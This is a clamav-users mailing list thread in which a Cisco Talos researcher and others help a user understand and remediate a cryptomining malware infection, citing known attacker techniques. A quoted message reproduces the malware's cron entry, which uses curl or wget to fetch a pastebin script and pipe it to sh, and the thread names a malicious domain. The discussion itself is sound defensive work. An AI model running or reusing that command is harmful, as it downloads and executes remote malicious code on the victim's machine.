Xavier,From the information you provided in your initial email, it sounds like the malware you encountered is described in-depth here:That blog post provides a lot of insight into what the malware they analyzed did, which will hopefully provide you with a way to better understand what the malware may have done on your machines. It's difficult to know for sure, though, since the one you encountered may have had differences to the one described. Your best bet to remediate is to just restore the server from known-good backups, if possible.At the end of last year, we published a blog post that tracked three groups spreading this type of malware. From https://blog.talosintelligence.com/2018/12/cryptomining-campaigns-2018.html, the groups tended to follow these TTPs:- Used Malicious shell scripts masquerading as JPEG files with the name "logo*.jpg" that install cron jobs and download and execute miners.- Used variants of the open-source miner XMRig intended for botnet mining, with versions dependent on the victim's architecture.- Scanned for and attempted to exploit recently published vulnerabilities in servers such as Apache Struts2, Oracle WebLogic and Drupal.- Used malicious scripts and malware hosted on Pastebin sites, Git repositories and domains with .tk TLDs.As you can tell, there's a lot of overlap between all of these, and it's not uncommon for one actor to take the scripts and binaries used by another and start using them (with slight modifications to use different C2, mine to a different wallet, etc.)Since there's so much overlap between tools and techniques, it's difficult to say for sure, but at first glance the infrastructure described in the Anomali blog post appears related to that of the malware described by these two articles as well:-AndrewAndrew WilliamsMalware Research EngineerCisco TalosOn Thu, Apr 25, 2019 at 11:27 PM Xavier Maysonnave via clamav-users <clamav-users@lists.clamav.net> wrote:Hi All,Thanks for your feedback.I'm going to report to Cloudflare this URL.However keep in mind that there are other URLs who are involved in this family.*/10 * * * * (curl -fsSL https://pastebin.com/raw/wR3ETdbi||wget -q -O- https://pastebin.com/raw/wR3ETdbi)|shThis one targets Jenkins, another popular OpenSource tool, not used on our infrastructure though.I'm still very interested with the consequences of this malwares. Any hints will be greatly appreciated.Thanks.LightLe ven. 26 avr. 2019 à 08:03, Dave Warren via clamav-users <clamav-users@lists.clamav.net> a écrit :The same applies: Report it. Cloudflare will either forward the
complaint for you, or block the offending URL (or both).
On 2019-04-25 19:16, Dennis Peterson wrote:
> That domain is hosted on a cloudflare IP block. They're become part of
> the problem.
>
> dp
>
> On 4/25/19 7:52 AM, J.R. via clamav-users wrote:
>> Perhaps it would also be worthwhile to report dd.heheda.tk to their
>> hosting provider & domain registrar that they are hosting malware and
>> get that site shut down...
>>
_______________________________________________
clamav-users mailing list
clamav-users@lists.clamav.net
https://lists.clamav.net/mailman/listinfo/clamav-users
Help us build a comprehensive ClamAV guide:
https://github.com/vrtadmin/clamav-faq
http://www.clamav.net/contact.html#ml
_______________________________________________
clamav-users mailing list
clamav-users@lists.clamav.net
https://lists.clamav.net/mailman/listinfo/clamav-users
Help us build a comprehensive ClamAV guide:
https://github.com/vrtadmin/clamav-faq
http://www.clamav.net/contact.html#ml